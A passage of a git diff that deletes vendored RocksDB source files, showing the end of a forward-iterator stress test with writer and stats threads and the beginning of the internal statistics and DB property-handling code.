-        std::chrono::nanoseconds((uint64_t)(1000000000 * FLAGS_runtime)));
-    std::vector<uint64_t> my_shards;
-    for (int i = 1; i <= FLAGS_shards; ++i) {
-      if ((*shard_states_)[i].writer == this) {
-        my_shards.push_back(i);
-      }
-    }
-
-    std::mt19937 rng{std::random_device()()};
-    std::uniform_int_distribution<int> shard_dist(
-        0, static_cast<int>(my_shards.size()) - 1);
-    std::string value(FLAGS_value_size, '*');
-
-    while (1) {
-      auto now = std::chrono::steady_clock::now();
-      if (FLAGS_runtime >= 0 && now >= deadline) {
-        break;
-      }
-      if (workq.empty()) {
-        for (int i = 0; i < FLAGS_rate; i += FLAGS_writers) {
-          std::chrono::nanoseconds offset(1000000000LL * i / FLAGS_rate);
-          workq.push(now + offset);
-        }
-      }
-      while (!workq.empty() && workq.front() < now) {
-        workq.pop();
-        uint64_t shard = my_shards[shard_dist(rng)];
-        ShardState& state = (*shard_states_)[shard];
-        uint64_t seqno = state.last_written.load() + 1;
-        Key key(shard, seqno);
-        // fprintf(stderr, "Writing (%ld, %ld)\n", shard, seqno);
-        rocksdb::Status status =
-            db_->Put(rocksdb::WriteOptions(),
-                     rocksdb::Slice((const char*)&key, sizeof(key)),
-                     rocksdb::Slice(value));
-        assert(status.ok());
-        state.last_written.store(seqno);
-        state.reader->onWrite(shard);
-        ++::stats.written;
-      }
-      std::this_thread::sleep_for(std::chrono::milliseconds(1));
-    }
-    // fprintf(stderr, "Writer done\n");
-  }
-
-  ~Writer() { thread_.join(); }
-
- private:
-  char pad1[128] __attribute__((__unused__));
-  std::vector<ShardState>* shard_states_;
-  rocksdb::DB* db_;
-  rocksdb::port::Thread thread_;
-  char pad2[128] __attribute__((__unused__));
-};
-
-struct StatsThread {
-  explicit StatsThread(rocksdb::DB* db)
-      : db_(db), thread_(&StatsThread::run, this) {}
-
-  void run() {
-    //    using namespace std::chrono;
-    auto tstart = std::chrono::steady_clock::now(), tlast = tstart;
-    uint64_t wlast = 0, rlast = 0;
-    while (!done_.load()) {
-      {
-        std::unique_lock<std::mutex> lock(cvm_);
-        cv_.wait_for(lock, std::chrono::seconds(1));
-      }
-      auto now = std::chrono::steady_clock::now();
-      double elapsed =
-          std::chrono::duration_cast<std::chrono::duration<double> >(
-              now - tlast).count();
-      uint64_t w = ::stats.written.load();
-      uint64_t r = ::stats.read.load();
-      fprintf(stderr,
-              "%s elapsed %4lds | written %10ld | w/s %10.0f | read %10ld | "
-              "r/s %10.0f | cache misses %10ld\n",
-              db_->GetEnv()->TimeToString(time(nullptr)).c_str(),
-              std::chrono::duration_cast<std::chrono::seconds>(now - tstart)
-                  .count(),
-              w, (w - wlast) / elapsed, r, (r - rlast) / elapsed,
-              ::stats.cache_misses.load());
-      wlast = w;
-      rlast = r;
-      tlast = now;
-    }
-  }
-
-  ~StatsThread() {
-    {
-      std::lock_guard<std::mutex> guard(cvm_);
-      done_.store(true);
-    }
-    cv_.notify_all();
-    thread_.join();
-  }
-
- private:
-  rocksdb::DB* db_;
-  std::mutex cvm_;
-  std::condition_variable cv_;
-  rocksdb::port::Thread thread_;
-  std::atomic<bool> done_{false};
-};
-
-int main(int argc, char** argv) {
-  GFLAGS::ParseCommandLineFlags(&argc, &argv, true);
-
-  std::mt19937 rng{std::random_device()()};
-  rocksdb::Status status;
-  std::string path = rocksdb::test::TmpDir() + "/forward_iterator_test";
-  fprintf(stderr, "db path is %s\n", path.c_str());
-  rocksdb::Options options;
-  options.create_if_missing = true;
-  options.compression = rocksdb::CompressionType::kNoCompression;
-  options.compaction_style = rocksdb::CompactionStyle::kCompactionStyleNone;
-  options.level0_slowdown_writes_trigger = 99999;
-  options.level0_stop_writes_trigger = 99999;
-  options.use_direct_io_for_flush_and_compaction = true;
-  options.write_buffer_size = FLAGS_memtable_size;
-  rocksdb::BlockBasedTableOptions table_options;
-  table_options.block_cache = rocksdb::NewLRUCache(FLAGS_block_cache_size);
-  table_options.block_size = FLAGS_block_size;
-  options.table_factory.reset(
-      rocksdb::NewBlockBasedTableFactory(table_options));
-
-  status = rocksdb::DestroyDB(path, options);
-  assert(status.ok());
-  rocksdb::DB* db_raw;
-  status = rocksdb::DB::Open(options, path, &db_raw);
-  assert(status.ok());
-  std::unique_ptr<rocksdb::DB> db(db_raw);
-
-  std::vector<ShardState> shard_states(FLAGS_shards + 1);
-  std::deque<Reader> readers;
-  while (static_cast<int>(readers.size()) < FLAGS_readers) {
-    readers.emplace_back(&shard_states, db_raw);
-  }
-  std::deque<Writer> writers;
-  while (static_cast<int>(writers.size()) < FLAGS_writers) {
-    writers.emplace_back(&shard_states, db_raw);
-  }
-
-  // Each shard gets a random reader and random writer assigned to it
-  for (int i = 1; i <= FLAGS_shards; ++i) {
-    std::uniform_int_distribution<int> reader_dist(0, FLAGS_readers - 1);
-    std::uniform_int_distribution<int> writer_dist(0, FLAGS_writers - 1);
-    shard_states[i].reader = &readers[reader_dist(rng)];
-    shard_states[i].writer = &writers[writer_dist(rng)];
-  }
-
-  StatsThread stats_thread(db_raw);
-  for (Writer& w : writers) {
-    w.start();
-  }
-
-  writers.clear();
-  readers.clear();
-}
-#endif  // !defined(GFLAGS) || defined(ROCKSDB_LITE)
diff --git a/thirdparty/rocksdb/db/internal_stats.cc b/thirdparty/rocksdb/db/internal_stats.cc
deleted file mode 100644
index e98bd98..0000000
--- a/thirdparty/rocksdb/db/internal_stats.cc
+++ /dev/null
@@ -1,1210 +0,0 @@
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/internal_stats.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <limits>
-#include <string>
-#include <utility>
-#include <vector>
-#include "db/column_family.h"
-
-#include "db/db_impl.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-
-const std::map<LevelStatType, LevelStat> InternalStats::compaction_level_stats =
-    {
-        {LevelStatType::NUM_FILES, LevelStat{"NumFiles", "Files"}},
-        {LevelStatType::COMPACTED_FILES,
-         LevelStat{"CompactedFiles", "CompactedFiles"}},
-        {LevelStatType::SIZE_BYTES, LevelStat{"SizeBytes", "Size"}},
-        {LevelStatType::SCORE, LevelStat{"Score", "Score"}},
-        {LevelStatType::READ_GB, LevelStat{"ReadGB", "Read(GB)"}},
-        {LevelStatType::RN_GB, LevelStat{"RnGB", "Rn(GB)"}},
-        {LevelStatType::RNP1_GB, LevelStat{"Rnp1GB", "Rnp1(GB)"}},
-        {LevelStatType::WRITE_GB, LevelStat{"WriteGB", "Write(GB)"}},
-        {LevelStatType::W_NEW_GB, LevelStat{"WnewGB", "Wnew(GB)"}},
-        {LevelStatType::MOVED_GB, LevelStat{"MovedGB", "Moved(GB)"}},
-        {LevelStatType::WRITE_AMP, LevelStat{"WriteAmp", "W-Amp"}},
-        {LevelStatType::READ_MBPS, LevelStat{"ReadMBps", "Rd(MB/s)"}},
-        {LevelStatType::WRITE_MBPS, LevelStat{"WriteMBps", "Wr(MB/s)"}},
-        {LevelStatType::COMP_SEC, LevelStat{"CompSec", "Comp(sec)"}},
-        {LevelStatType::COMP_COUNT, LevelStat{"CompCount", "Comp(cnt)"}},
-        {LevelStatType::AVG_SEC, LevelStat{"AvgSec", "Avg(sec)"}},
-        {LevelStatType::KEY_IN, LevelStat{"KeyIn", "KeyIn"}},
-        {LevelStatType::KEY_DROP, LevelStat{"KeyDrop", "KeyDrop"}},
-};
-
-namespace {
-const double kMB = 1048576.0;
-const double kGB = kMB * 1024;
-const double kMicrosInSec = 1000000.0;
-
-void PrintLevelStatsHeader(char* buf, size_t len, const std::string& cf_name) {
-  int written_size =
-      snprintf(buf, len, "\n** Compaction Stats [%s] **\n", cf_name.c_str());
-  auto hdr = [](LevelStatType t) {
-    return InternalStats::compaction_level_stats.at(t).header_name.c_str();
-  };
-  int line_size = snprintf(
-      buf + written_size, len - written_size,
-      "Level    %s   %s     %s %s  %s %s %s %s %s %s %s %s %s %s %s %s %s\n",
-      // Note that we skip COMPACTED_FILES and merge it with Files column
-      hdr(LevelStatType::NUM_FILES), hdr(LevelStatType::SIZE_BYTES),
-      hdr(LevelStatType::SCORE), hdr(LevelStatType::READ_GB),
-      hdr(LevelStatType::RN_GB), hdr(LevelStatType::RNP1_GB),
-      hdr(LevelStatType::WRITE_GB), hdr(LevelStatType::W_NEW_GB),
-      hdr(LevelStatType::MOVED_GB), hdr(LevelStatType::WRITE_AMP),
-      hdr(LevelStatType::READ_MBPS), hdr(LevelStatType::WRITE_MBPS),
-      hdr(LevelStatType::COMP_SEC), hdr(LevelStatType::COMP_COUNT),
-      hdr(LevelStatType::AVG_SEC), hdr(LevelStatType::KEY_IN),
-      hdr(LevelStatType::KEY_DROP));
-
-  written_size += line_size;
-  snprintf(buf + written_size, len - written_size, "%s\n",
-           std::string(line_size, '-').c_str());
-}
-
-void PrepareLevelStats(std::map<LevelStatType, double>* level_stats,
-                       int num_files, int being_compacted,
-                       double total_file_size, double score, double w_amp,
-                       const InternalStats::CompactionStats& stats) {
-  uint64_t bytes_read =
-      stats.bytes_read_non_output_levels + stats.bytes_read_output_level;
-  int64_t bytes_new =
-      stats.bytes_written - stats.bytes_read_output_level;
-  double elapsed = (stats.micros + 1) / kMicrosInSec;
-
-  (*level_stats)[LevelStatType::NUM_FILES] = num_files;
-  (*level_stats)[LevelStatType::COMPACTED_FILES] = being_compacted;
-  (*level_stats)[LevelStatType::SIZE_BYTES] = total_file_size;
-  (*level_stats)[LevelStatType::SCORE] = score;
-  (*level_stats)[LevelStatType::READ_GB] = bytes_read / kGB;
-  (*level_stats)[LevelStatType::RN_GB] =
-      stats.bytes_read_non_output_levels / kGB;
-  (*level_stats)[LevelStatType::RNP1_GB] = stats.bytes_read_output_level / kGB;
-  (*level_stats)[LevelStatType::WRITE_GB] = stats.bytes_written / kGB;
-  (*level_stats)[LevelStatType::W_NEW_GB] = bytes_new / kGB;
-  (*level_stats)[LevelStatType::MOVED_GB] = stats.bytes_moved / kGB;
-  (*level_stats)[LevelStatType::WRITE_AMP] = w_amp;
-  (*level_stats)[LevelStatType::READ_MBPS] = bytes_read / kMB / elapsed;
-  (*level_stats)[LevelStatType::WRITE_MBPS] =
-      stats.bytes_written / kMB / elapsed;
-  (*level_stats)[LevelStatType::COMP_SEC] = stats.micros / kMicrosInSec;
-  (*level_stats)[LevelStatType::COMP_COUNT] = stats.count;
-  (*level_stats)[LevelStatType::AVG_SEC] =
-      stats.count == 0 ? 0 : stats.micros / kMicrosInSec / stats.count;
-  (*level_stats)[LevelStatType::KEY_IN] =
-      static_cast<double>(stats.num_input_records);
-  (*level_stats)[LevelStatType::KEY_DROP] =
-      static_cast<double>(stats.num_dropped_records);
-}
-
-void PrintLevelStats(char* buf, size_t len, const std::string& name,
-                     const std::map<LevelStatType, double>& stat_value) {
-  snprintf(buf, len,
-           "%4s "      /*  Level */
-           "%6d/%-3d " /*  Files */
-           "%8s "      /*  Size */
-           "%5.1f "    /*  Score */
-           "%8.1f "    /*  Read(GB) */
-           "%7.1f "    /*  Rn(GB) */
-           "%8.1f "    /*  Rnp1(GB) */
-           "%9.1f "    /*  Write(GB) */
-           "%8.1f "    /*  Wnew(GB) */
-           "%9.1f "    /*  Moved(GB) */
-           "%5.1f "    /*  W-Amp */
-           "%8.1f "    /*  Rd(MB/s) */
-           "%8.1f "    /*  Wr(MB/s) */
-           "%9.0f "    /*  Comp(sec) */
-           "%9d "      /*  Comp(cnt) */
-           "%8.3f "    /*  Avg(sec) */
-           "%7s "      /*  KeyIn */
-           "%6s\n",    /*  KeyDrop */
-           name.c_str(),
-           static_cast<int>(stat_value.at(LevelStatType::NUM_FILES)),
-           static_cast<int>(stat_value.at(LevelStatType::COMPACTED_FILES)),
-           BytesToHumanString(
-               static_cast<uint64_t>(stat_value.at(LevelStatType::SIZE_BYTES)))
-               .c_str(),
-           stat_value.at(LevelStatType::SCORE),
-           stat_value.at(LevelStatType::READ_GB),
-           stat_value.at(LevelStatType::RN_GB),
-           stat_value.at(LevelStatType::RNP1_GB),
-           stat_value.at(LevelStatType::WRITE_GB),
-           stat_value.at(LevelStatType::W_NEW_GB),
-           stat_value.at(LevelStatType::MOVED_GB),
-           stat_value.at(LevelStatType::WRITE_AMP),
-           stat_value.at(LevelStatType::READ_MBPS),
-           stat_value.at(LevelStatType::WRITE_MBPS),
-           stat_value.at(LevelStatType::COMP_SEC),
-           static_cast<int>(stat_value.at(LevelStatType::COMP_COUNT)),
-           stat_value.at(LevelStatType::AVG_SEC),
-           NumberToHumanString(
-               static_cast<std::int64_t>(stat_value.at(LevelStatType::KEY_IN)))
-               .c_str(),
-           NumberToHumanString(static_cast<std::int64_t>(
-                                   stat_value.at(LevelStatType::KEY_DROP)))
-               .c_str());
-}
-
-void PrintLevelStats(char* buf, size_t len, const std::string& name,
-                     int num_files, int being_compacted, double total_file_size,
-                     double score, double w_amp,
-                     const InternalStats::CompactionStats& stats) {
-  std::map<LevelStatType, double> level_stats;
-  PrepareLevelStats(&level_stats, num_files, being_compacted, total_file_size,
-                    score, w_amp, stats);
-  PrintLevelStats(buf, len, name, level_stats);
-}
-
-// Assumes that trailing numbers represent an optional argument. This requires
-// property names to not end with numbers.
-std::pair<Slice, Slice> GetPropertyNameAndArg(const Slice& property) {
-  Slice name = property, arg = property;
-  size_t sfx_len = 0;
-  while (sfx_len < property.size() &&
-         isdigit(property[property.size() - sfx_len - 1])) {
-    ++sfx_len;
-  }
-  name.remove_suffix(sfx_len);
-  arg.remove_prefix(property.size() - sfx_len);
-  return {name, arg};
-}
-}  // anonymous namespace
-
-static const std::string rocksdb_prefix = "rocksdb.";
-
-static const std::string num_files_at_level_prefix = "num-files-at-level";
-static const std::string compression_ratio_at_level_prefix =
-    "compression-ratio-at-level";
-static const std::string allstats = "stats";
-static const std::string sstables = "sstables";
-static const std::string cfstats = "cfstats";
-static const std::string cfstats_no_file_histogram =
-    "cfstats-no-file-histogram";
-static const std::string cf_file_histogram = "cf-file-histogram";
-static const std::string dbstats = "dbstats";
-static const std::string levelstats = "levelstats";
-static const std::string num_immutable_mem_table = "num-immutable-mem-table";
-static const std::string num_immutable_mem_table_flushed =
-    "num-immutable-mem-table-flushed";
-static const std::string mem_table_flush_pending = "mem-table-flush-pending";
-static const std::string compaction_pending = "compaction-pending";
-static const std::string background_errors = "background-errors";
-static const std::string cur_size_active_mem_table =
-                          "cur-size-active-mem-table";
-static const std::string cur_size_all_mem_tables = "cur-size-all-mem-tables";
-static const std::string size_all_mem_tables = "size-all-mem-tables";
-static const std::string num_entries_active_mem_table =
-                          "num-entries-active-mem-table";
-static const std::string num_entries_imm_mem_tables =
-                          "num-entries-imm-mem-tables";
-static const std::string num_deletes_active_mem_table =
-                          "num-deletes-active-mem-table";
-static const std::string num_deletes_imm_mem_tables =
-                          "num-deletes-imm-mem-tables";
-static const std::string estimate_num_keys = "estimate-num-keys";
-static const std::string estimate_table_readers_mem =
-                          "estimate-table-readers-mem";
-static const std::string is_file_deletions_enabled =
-                          "is-file-deletions-enabled";
-static const std::string num_snapshots = "num-snapshots";
-static const std::string oldest_snapshot_time = "oldest-snapshot-time";
-static const std::string num_live_versions = "num-live-versions";
-static const std::string current_version_number =
-    "current-super-version-number";
-static const std::string estimate_live_data_size = "estimate-live-data-size";
-static const std::string min_log_number_to_keep = "min-log-number-to-keep";
-static const std::string base_level = "base-level";
-static const std::string total_sst_files_size = "total-sst-files-size";
-static const std::string estimate_pending_comp_bytes =
-    "estimate-pending-compaction-bytes";
-static const std::string aggregated_table_properties =
-    "aggregated-table-properties";
-static const std::string aggregated_table_properties_at_level =
-    aggregated_table_properties + "-at-level";
-static const std::string num_running_compactions = "num-running-compactions";
-static const std::string num_running_flushes = "num-running-flushes";
-static const std::string actual_delayed_write_rate =
-    "actual-delayed-write-rate";
-static const std::string is_write_stopped = "is-write-stopped";
-static const std::string estimate_oldest_key_time = "estimate-oldest-key-time";
-
-const std::string DB::Properties::kNumFilesAtLevelPrefix =
-                      rocksdb_prefix + num_files_at_level_prefix;
-const std::string DB::Properties::kCompressionRatioAtLevelPrefix =
-                      rocksdb_prefix + compression_ratio_at_level_prefix;
-const std::string DB::Properties::kStats = rocksdb_prefix + allstats;
-const std::string DB::Properties::kSSTables = rocksdb_prefix + sstables;
-const std::string DB::Properties::kCFStats = rocksdb_prefix + cfstats;
-const std::string DB::Properties::kCFStatsNoFileHistogram =
-    rocksdb_prefix + cfstats_no_file_histogram;
-const std::string DB::Properties::kCFFileHistogram =
-    rocksdb_prefix + cf_file_histogram;
-const std::string DB::Properties::kDBStats = rocksdb_prefix + dbstats;
-const std::string DB::Properties::kLevelStats = rocksdb_prefix + levelstats;
-const std::string DB::Properties::kNumImmutableMemTable =
-                      rocksdb_prefix + num_immutable_mem_table;
-const std::string DB::Properties::kNumImmutableMemTableFlushed =
-    rocksdb_prefix + num_immutable_mem_table_flushed;
-const std::string DB::Properties::kMemTableFlushPending =
-                      rocksdb_prefix + mem_table_flush_pending;
-const std::string DB::Properties::kCompactionPending =
-                      rocksdb_prefix + compaction_pending;
-const std::string DB::Properties::kNumRunningCompactions =
-    rocksdb_prefix + num_running_compactions;
-const std::string DB::Properties::kNumRunningFlushes =
-    rocksdb_prefix + num_running_flushes;
-const std::string DB::Properties::kBackgroundErrors =
-                      rocksdb_prefix + background_errors;
-const std::string DB::Properties::kCurSizeActiveMemTable =
-                      rocksdb_prefix + cur_size_active_mem_table;
-const std::string DB::Properties::kCurSizeAllMemTables =
-    rocksdb_prefix + cur_size_all_mem_tables;
-const std::string DB::Properties::kSizeAllMemTables =
-    rocksdb_prefix + size_all_mem_tables;
-const std::string DB::Properties::kNumEntriesActiveMemTable =
-                      rocksdb_prefix + num_entries_active_mem_table;
-const std::string DB::Properties::kNumEntriesImmMemTables =
-                      rocksdb_prefix + num_entries_imm_mem_tables;
-const std::string DB::Properties::kNumDeletesActiveMemTable =
-                      rocksdb_prefix + num_deletes_active_mem_table;
-const std::string DB::Properties::kNumDeletesImmMemTables =
-                      rocksdb_prefix + num_deletes_imm_mem_tables;
-const std::string DB::Properties::kEstimateNumKeys =
-                      rocksdb_prefix + estimate_num_keys;
-const std::string DB::Properties::kEstimateTableReadersMem =
-                      rocksdb_prefix + estimate_table_readers_mem;
-const std::string DB::Properties::kIsFileDeletionsEnabled =
-                      rocksdb_prefix + is_file_deletions_enabled;
-const std::string DB::Properties::kNumSnapshots =
-                      rocksdb_prefix + num_snapshots;
-const std::string DB::Properties::kOldestSnapshotTime =
-                      rocksdb_prefix + oldest_snapshot_time;
-const std::string DB::Properties::kNumLiveVersions =
-                      rocksdb_prefix + num_live_versions;
-const std::string DB::Properties::kCurrentSuperVersionNumber =
-    rocksdb_prefix + current_version_number;
-const std::string DB::Properties::kEstimateLiveDataSize =
-                      rocksdb_prefix + estimate_live_data_size;
-const std::string DB::Properties::kMinLogNumberToKeep =
-    rocksdb_prefix + min_log_number_to_keep;
-const std::string DB::Properties::kTotalSstFilesSize =
-                      rocksdb_prefix + total_sst_files_size;
-const std::string DB::Properties::kBaseLevel = rocksdb_prefix + base_level;
-const std::string DB::Properties::kEstimatePendingCompactionBytes =
-    rocksdb_prefix + estimate_pending_comp_bytes;
-const std::string DB::Properties::kAggregatedTableProperties =
-    rocksdb_prefix + aggregated_table_properties;
-const std::string DB::Properties::kAggregatedTablePropertiesAtLevel =
-    rocksdb_prefix + aggregated_table_properties_at_level;
-const std::string DB::Properties::kActualDelayedWriteRate =
-    rocksdb_prefix + actual_delayed_write_rate;
-const std::string DB::Properties::kIsWriteStopped =
-    rocksdb_prefix + is_write_stopped;
-const std::string DB::Properties::kEstimateOldestKeyTime =
-    rocksdb_prefix + estimate_oldest_key_time;
-
-const std::unordered_map<std::string, DBPropertyInfo>
-    InternalStats::ppt_name_to_info = {
-        {DB::Properties::kNumFilesAtLevelPrefix,
-         {false, &InternalStats::HandleNumFilesAtLevel, nullptr, nullptr}},
-        {DB::Properties::kCompressionRatioAtLevelPrefix,
-         {false, &InternalStats::HandleCompressionRatioAtLevelPrefix, nullptr,
-          nullptr}},
-        {DB::Properties::kLevelStats,
-         {false, &InternalStats::HandleLevelStats, nullptr, nullptr}},
-        {DB::Properties::kStats,
-         {false, &InternalStats::HandleStats, nullptr, nullptr}},
-        {DB::Properties::kCFStats,
-         {false, &InternalStats::HandleCFStats, nullptr,
-          &InternalStats::HandleCFMapStats}},
-        {DB::Properties::kCFStatsNoFileHistogram,
-         {false, &InternalStats::HandleCFStatsNoFileHistogram, nullptr,
-          nullptr}},
-        {DB::Properties::kCFFileHistogram,
-         {false, &InternalStats::HandleCFFileHistogram, nullptr, nullptr}},
-        {DB::Properties::kDBStats,
-         {false, &InternalStats::HandleDBStats, nullptr, nullptr}},
-        {DB::Properties::kSSTables,
-         {false, &InternalStats::HandleSsTables, nullptr, nullptr}},
-        {DB::Properties::kAggregatedTableProperties,
-         {false, &InternalStats::HandleAggregatedTableProperties, nullptr,
-          nullptr}},
-        {DB::Properties::kAggregatedTablePropertiesAtLevel,
-         {false, &InternalStats::HandleAggregatedTablePropertiesAtLevel,
-          nullptr, nullptr}},
-        {DB::Properties::kNumImmutableMemTable,
-         {false, nullptr, &InternalStats::HandleNumImmutableMemTable, nullptr}},
-        {DB::Properties::kNumImmutableMemTableFlushed,
-         {false, nullptr, &InternalStats::HandleNumImmutableMemTableFlushed,
-          nullptr}},
-        {DB::Properties::kMemTableFlushPending,
-         {false, nullptr, &InternalStats::HandleMemTableFlushPending, nullptr}},
-        {DB::Properties::kCompactionPending,
-         {false, nullptr, &InternalStats::HandleCompactionPending, nullptr}},
-        {DB::Properties::kBackgroundErrors,
-         {false, nullptr, &InternalStats::HandleBackgroundErrors, nullptr}},
-        {DB::Properties::kCurSizeActiveMemTable,
-         {false, nullptr, &InternalStats::HandleCurSizeActiveMemTable,
-          nullptr}},
-        {DB::Properties::kCurSizeAllMemTables,
-         {false, nullptr, &InternalStats::HandleCurSizeAllMemTables, nullptr}},
-        {DB::Properties::kSizeAllMemTables,
-         {false, nullptr, &InternalStats::HandleSizeAllMemTables, nullptr}},
-        {DB::Properties::kNumEntriesActiveMemTable,
-         {false, nullptr, &InternalStats::HandleNumEntriesActiveMemTable,
-          nullptr}},
-        {DB::Properties::kNumEntriesImmMemTables,
-         {false, nullptr, &InternalStats::HandleNumEntriesImmMemTables,
-          nullptr}},
-        {DB::Properties::kNumDeletesActiveMemTable,
-         {false, nullptr, &InternalStats::HandleNumDeletesActiveMemTable,
-          nullptr}},
-        {DB::Properties::kNumDeletesImmMemTables,
-         {false, nullptr, &InternalStats::HandleNumDeletesImmMemTables,
-          nullptr}},
-        {DB::Properties::kEstimateNumKeys,
-         {false, nullptr, &InternalStats::HandleEstimateNumKeys, nullptr}},
-        {DB::Properties::kEstimateTableReadersMem,
-         {true, nullptr, &InternalStats::HandleEstimateTableReadersMem,
-          nullptr}},
-        {DB::Properties::kIsFileDeletionsEnabled,
-         {false, nullptr, &InternalStats::HandleIsFileDeletionsEnabled,
-          nullptr}},
-        {DB::Properties::kNumSnapshots,
-         {false, nullptr, &InternalStats::HandleNumSnapshots, nullptr}},
-        {DB::Properties::kOldestSnapshotTime,
-         {false, nullptr, &InternalStats::HandleOldestSnapshotTime, nullptr}},
-        {DB::Properties::kNumLiveVersions,
-         {false, nullptr, &InternalStats::HandleNumLiveVersions, nullptr}},
-        {DB::Properties::kCurrentSuperVersionNumber,
-         {false, nullptr, &InternalStats::HandleCurrentSuperVersionNumber,
-          nullptr}},
-        {DB::Properties::kEstimateLiveDataSize,
-         {true, nullptr, &InternalStats::HandleEstimateLiveDataSize, nullptr}},
-        {DB::Properties::kMinLogNumberToKeep,
-         {false, nullptr, &InternalStats::HandleMinLogNumberToKeep, nullptr}},
-        {DB::Properties::kBaseLevel,
-         {false, nullptr, &InternalStats::HandleBaseLevel, nullptr}},
-        {DB::Properties::kTotalSstFilesSize,
-         {false, nullptr, &InternalStats::HandleTotalSstFilesSize, nullptr}},
-        {DB::Properties::kEstimatePendingCompactionBytes,
-         {false, nullptr, &InternalStats::HandleEstimatePendingCompactionBytes,
-          nullptr}},
-        {DB::Properties::kNumRunningFlushes,
-         {false, nullptr, &InternalStats::HandleNumRunningFlushes, nullptr}},
-        {DB::Properties::kNumRunningCompactions,
-         {false, nullptr, &InternalStats::HandleNumRunningCompactions,
-          nullptr}},
-        {DB::Properties::kActualDelayedWriteRate,
-         {false, nullptr, &InternalStats::HandleActualDelayedWriteRate,
-          nullptr}},
-        {DB::Properties::kIsWriteStopped,
-         {false, nullptr, &InternalStats::HandleIsWriteStopped, nullptr}},
-        {DB::Properties::kEstimateOldestKeyTime,
-         {false, nullptr, &InternalStats::HandleEstimateOldestKeyTime,
-          nullptr}},
-};
-
-const DBPropertyInfo* GetPropertyInfo(const Slice& property) {
-  std::string ppt_name = GetPropertyNameAndArg(property).first.ToString();
-  auto ppt_info_iter = InternalStats::ppt_name_to_info.find(ppt_name);
-  if (ppt_info_iter == InternalStats::ppt_name_to_info.end()) {
-    return nullptr;
-  }
-  return &ppt_info_iter->second;
-}
-
-bool InternalStats::GetStringProperty(const DBPropertyInfo& property_info,
-                                      const Slice& property,
-                                      std::string* value) {
-  assert(value != nullptr);
-  assert(property_info.handle_string != nullptr);
-  Slice arg = GetPropertyNameAndArg(property).second;
-  return (this->*(property_info.handle_string))(value, arg);
-}
-
-bool InternalStats::GetMapProperty(const DBPropertyInfo& property_info,
-                                   const Slice& property,
-                                   std::map<std::string, double>* value) {
-  assert(value != nullptr);
-  assert(property_info.handle_map != nullptr);
-  return (this->*(property_info.handle_map))(value);
-}
-
-bool InternalStats::GetIntProperty(const DBPropertyInfo& property_info,
-                                   uint64_t* value, DBImpl* db) {
-  assert(value != nullptr);
-  assert(property_info.handle_int != nullptr &&
-         !property_info.need_out_of_mutex);
-  db->mutex_.AssertHeld();
-  return (this->*(property_info.handle_int))(value, db, nullptr /* version */);
-}
-
-bool InternalStats::GetIntPropertyOutOfMutex(
-    const DBPropertyInfo& property_info, Version* version, uint64_t* value) {
-  assert(value != nullptr);
-  assert(property_info.handle_int != nullptr &&
-         property_info.need_out_of_mutex);
-  return (this->*(property_info.handle_int))(value, nullptr /* db */, version);
-}
-
-bool InternalStats::HandleNumFilesAtLevel(std::string* value, Slice suffix) {
-  uint64_t level;
-  const auto* vstorage = cfd_->current()->storage_info();
-  bool ok = ConsumeDecimalNumber(&suffix, &level) && suffix.empty();
-  if (!ok || static_cast<int>(level) >= number_levels_) {
-    return false;
-  } else {
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%d",
-             vstorage->NumLevelFiles(static_cast<int>(level)));
-    *value = buf;
-    return true;
-  }
-}
-
-bool InternalStats::HandleCompressionRatioAtLevelPrefix(std::string* value,
-                                                        Slice suffix) {
-  uint64_t level;
-  const auto* vstorage = cfd_->current()->storage_info();
-  bool ok = ConsumeDecimalNumber(&suffix, &level) && suffix.empty();
-  if (!ok || level >= static_cast<uint64_t>(number_levels_)) {
-    return false;
-  }
-  *value = ToString(
-      vstorage->GetEstimatedCompressionRatioAtLevel(static_cast<int>(level)));
-  return true;
-}
-
-bool InternalStats::HandleLevelStats(std::string* value, Slice suffix) {
-  char buf[1000];
-  const auto* vstorage = cfd_->current()->storage_info();
-  snprintf(buf, sizeof(buf),
-           "Level Files Size(MB)\n"
-           "--------------------\n");
-  value->append(buf);
-
-  for (int level = 0; level < number_levels_; level++) {
-    snprintf(buf, sizeof(buf), "%3d %8d %8.0f\n", level,
-             vstorage->NumLevelFiles(level),
-             vstorage->NumLevelBytes(level) / kMB);
-    value->append(buf);
-  }
-  return true;
-}
-
-bool InternalStats::HandleStats(std::string* value, Slice suffix) {
-  if (!HandleCFStats(value, suffix)) {
-    return false;
-  }
-  if (!HandleDBStats(value, suffix)) {
-    return false;
-  }
-  return true;
-}
-
-bool InternalStats::HandleCFMapStats(std::map<std::string, double>* cf_stats) {
-  DumpCFMapStats(cf_stats);
-  return true;
-}
-
-bool InternalStats::HandleCFStats(std::string* value, Slice suffix) {
-  DumpCFStats(value);
-  return true;
-}
-
-bool InternalStats::HandleCFStatsNoFileHistogram(std::string* value,
-                                                 Slice suffix) {
-  DumpCFStatsNoFileHistogram(value);
-  return true;
-}
-
-bool InternalStats::HandleCFFileHistogram(std::string* value, Slice suffix) {
-  DumpCFFileHistogram(value);
-  return true;
-}
-
-bool InternalStats::HandleDBStats(std::string* value, Slice suffix) {
-  DumpDBStats(value);
-  return true;
-}
-
-bool InternalStats::HandleSsTables(std::string* value, Slice suffix) {
-  auto* current = cfd_->current();
-  *value = current->DebugString(true, true);
-  return true;
-}
-
-bool InternalStats::HandleAggregatedTableProperties(std::string* value,
-                                                    Slice suffix) {
-  std::shared_ptr<const TableProperties> tp;
-  auto s = cfd_->current()->GetAggregatedTableProperties(&tp);
-  if (!s.ok()) {
-    return false;
-  }
-  *value = tp->ToString();
-  return true;
-}
-
-bool InternalStats::HandleAggregatedTablePropertiesAtLevel(std::string* value,
-                                                           Slice suffix) {
-  uint64_t level;
-  bool ok = ConsumeDecimalNumber(&suffix, &level) && suffix.empty();
-  if (!ok || static_cast<int>(level) >= number_levels_) {
-    return false;
-  }
-  std::shared_ptr<const TableProperties> tp;
-  auto s = cfd_->current()->GetAggregatedTableProperties(
-      &tp, static_cast<int>(level));
